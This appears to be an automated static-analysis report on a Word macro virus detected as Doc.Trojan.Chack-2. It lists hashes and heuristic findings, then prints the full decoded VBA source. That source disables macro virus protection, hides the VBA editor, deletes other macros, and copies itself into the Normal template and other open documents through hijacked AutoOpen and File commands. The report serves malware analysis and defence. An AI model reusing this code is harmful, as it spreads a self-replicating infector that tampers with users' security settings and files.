Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 070de380734fd5d4…

MALICIOUS

Office (OLE)

98.5 KB Created: 2001-02-22 02:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2ef90a16583953c30e7b4bc6380dda85 SHA-1: e35ec2bab4fedc25df2065833ff749bcbc76dfae SHA-256: 070de380734fd5d467ad9eb1145c5cd71a3c8d9466eed3356a5c24985aae1b9f
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits critical heuristic firings for legacy WordBasic macro virus markers and VBA macros, specifically an AutoOpen macro. The ClamAV detection 'Doc.Trojan.Chack-2' strongly suggests malicious intent. The VBA script, named 'Destro_Exl', contains comments and subroutines that appear to be part of a macro-based malware, likely designed to execute malicious actions upon document opening.

Heuristics 5

  • ClamAV: Doc.Trojan.Chack-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Chack-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
          Application.OrganizerCopy Source:=ActiveD.FullName, Destination:=NormalT.FullName, Name:="Destro_Exl", Object:=wdOrganizerObjectProjectItems
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6819 bytes
SHA-256: 8f3abaf5acbe460344ff9f7c7e4a477c6324b5073aa98c1777327c1a17569502
Detection
ClamAV: Doc.Trojan.Chack-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Destro_Exl"
' Destro Exl Macros By Silent Warrior
' Blood Mask
' December 1998

' Kay sarap maglaro, kung alam mo ang iyong nilalaro
' Makiisa sa tahimik na labanan

' kreeeeeez

Public Superman
Public Batman
Public Mario
Public Luigi

Sub BMX()
    Superman = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call Indian
    WordBasic.DisableAutoMacros 0
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    CommandBars("Help").Controls(6).Caption = "Silent Warrior 1998"
    On Error GoTo 0
End Sub

Sub RollerBlade()
    Call Indian
    On Error GoTo Active_Balls
    Mario = False
    Set ActiveD = ActiveDocument
    Set NormalT = NormalTemplate
    On Error GoTo Inactive_Balls
    For i = 1 To NormalT.VBProject.VBComponents.Count
      NMacr = NormalT.VBProject.VBComponents(i).Name
      If NMacr = "Destro_Exl" Then Mario = True
      If (NMacr <> "Destro_Exl") And (NMacr <> "Blood_Mask") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NormalT.FullName, Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Inactive_Balls:
    If Not (Mario) Then
      On Error GoTo NotMe
      Application.OrganizerCopy Source:=ActiveD.FullName, Destination:=NormalT.FullName, Name:="Destro_Exl", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=ActiveD.FullName, Destination:=NormalT.FullName, Name:="Blood_Mask", Object:=wdOrganizerObjectProjectItems
      Templates(NormalT.FullName).Save
NotMe:
    End If
Active_Balls:
End Sub

Sub AirGlider()
    On Error GoTo Active_Wings
    Batman = 0
    Luigi = False
    Set ActiveD = ActiveDocument
    Set NormalT = NormalTemplate
    On Error GoTo Inactive_Wings
    For i = 1 To ActiveD.VBProject.VBComponents.Count
      NMacr = ActiveD.VBProject.VBComponents(i).Name
      If NMacr = "Destro_Exl" Then Luigi = True
      NMacr = NormalT.VBProject.VBComponents(i).Name
      If NMacr = "Destro_Exl" Then Luigi = True
      If (NMacr <> "Destro_Exl") And (NMacr <> "Blood_Mask") And (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=ActiveD.FullName, Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Inactive_Wings:
    If Luigi = False Then
      On Error GoTo Erh2
    Application.OrganizerCopy Source:=NormalT.FullName, Destination:=ActiveD.FullName, Name:="Blood_Mask", Object:=wdOrganizerObjectProjectItems
      Batman = 1
Erh2:
    End If
Active_Wings:
End Sub

Sub QuickFixToAll()
    Call RollerBlade
    Flip = ActiveDocument.Name
    For j = 1 To Documents.Count
    Documents(j).Activate
    Set ActiveD = ActiveDocument
    For i = 1 To ActiveD.VBProject.VBComponents.Count
      On Error GoTo FineLift
      NMacr = ActiveD.VBProject.VBComponents(i).Name
      If (NMacr <> "Destro_Exl") And (NMacr <> "Blood_Mask") And (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=ActiveD.FullName, Name:=NMacr, Object:=wdOrganizerObjectProjectItems
        Peeks = True
        Else
        Peeks = False
      End If
    Next i
FineLift:
    If Peeks Then ActiveDocument.Save
    Next j
    On Error GoTo DomainX
    For i = 1 To Documents.Count
        Documents(i).Activate
        Call AirGlider
    Next i
    For i = 1 To Documents.Count
        If Documents(i).Name = Flip Then Documents(i).Activate
    Next i
DomainX:
End Sub

Sub Indian()
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
End Sub

Sub DestroExl()
    Call BMX
    Call RollerBlade
    Application.DisplayAlerts = Superman
End Sub

Sub The_Beatles()
    On Error GoTo John_Lennon
Set ActiveD = ActiveDocument
    If Batman = 1 Then
       ActiveD.SaveAs FileName:=ActiveD.Name, FileFormat:=wdFormatDocument
    End If
John_Lennon:
End Sub

Sub AutoOpen()
    On Error Resume Next
    Call DestroExl
End Sub

Sub FileClose()
    Call BMX
    Call RollerBlade
    Call AirGlider
    Application.DisplayAlerts = Superman
    WordBasic.FileClose
End Sub

Sub FileOpen()
    On Error GoTo Digits
    Call DestroExl
    Dialogs(wdDialogFileOpen).Show
    Call QuickFixToAll
    Call BMX
    Call AirGlider
    Call The_Beatles
Digits:
    Application.DisplayAlerts = Superman
End Sub

Sub FileSave()
    Call BMX
    Call RollerBlade
    Call AirGlider
    Application.DisplayAlerts = Superman
    On Error GoTo Blade
    If ActiveDocument.Saved = False Then ActiveDocument.Save
Blade:
End Sub

Sub FileSaveAs()
    Call BMX
    Call RollerBlade
    Call AirGlider
    Application.DisplayAlerts = Superman
    Dialogs(wdDialogFileSaveAs).Show
End Sub

Sub FileExit()
    Call BMX
    Call RollerBlade
    Call AirGlider
    On Error GoTo Heaven
    If WeekDay(Date) = 6 Then Blood_Mask.Show
Heaven:
    Application.DisplayAlerts = Superman
    WordBasic.FileExit
End Sub

Sub HelpAbout()
    On Error GoTo Hell
    Blood_Mask.Show
Hell:
End Sub

Sub ToolsOptions()
    Dialogs(wdDialogToolsOptions).Show
    Call DestroExl
End Sub

Sub FileNew()
    Call DestroExl
    Dialogs(wdDialogFileNew).Show
End Sub

Sub FileTemplates()
    Call DestroExl
End Sub

Sub ToolsMacro()
    Call DestroExl
End Sub

Sub ToolsCustomize()
    Call DestroExl
End Sub

Sub ToolsCustomizeKeyboard()
    Call DestroExl
End Sub

Sub ViewVBCode()
    Call DestroExl
End Sub

Sub Organizer()
End Sub

Attribute VB_Name = "Blood_Mask"
Attribute VB_Base = "0{22040A93-0825-11D5-934E-0050DA64CF3A}{22040A81-0825-11D5-934E-0050DA64CF3A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

































Private Sub CommandButton1_Click()
    On Error Resume Next
    Call Destro_Exl.DestroExl
    Call Destro_Exl.QuickFixToAll
    Me.Hide
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.